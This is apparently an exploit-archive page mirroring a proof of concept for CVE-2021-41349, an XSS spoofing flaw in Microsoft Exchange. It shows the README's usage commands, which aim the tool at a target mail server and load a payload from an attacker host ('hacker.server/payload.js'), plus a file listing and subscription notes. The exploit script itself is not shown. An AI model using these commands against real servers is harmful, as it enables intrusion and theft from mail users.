Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-41349 PoC — Microsoft Exchange Server Spoofing Vulnerability

Source
https://github.com/exploit-io/CVE-2021-41349
Associated Vulnerability
Title:Microsoft Exchange Server Spoofing Vulnerability (CVE-2021-41349)
Description:Microsoft Exchange Server Spoofing Vulnerability
Description
Exploiting: CVE-2021-41349
Readme
# Microsoft Exchange Exploit CVE-2021-41349
Exploiting: CVE-2021-41349
This exploiting tool creates a Form for posting XSS Payload to the target Exchange server.
You need to create a `js` containing your desire to do.

# Usage
1. Create Your `js` Payload and upload it somewhare.
2. run the `CVE-2021-41349.py` same as following steps.
```shell
python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
```
or:
```shell
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
```
3. Upload The `html` file into server.
4. Done! Test it!

# Credits
* [@exploitio](https://twitter.com/exploitio)
File Snapshot

 [4.0K]  /data/pocs/4422545cfb04edd6037de3aba0495478ccc936e8
├── [2.3K]  CVE-2021-41349.py
└── [ 665]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →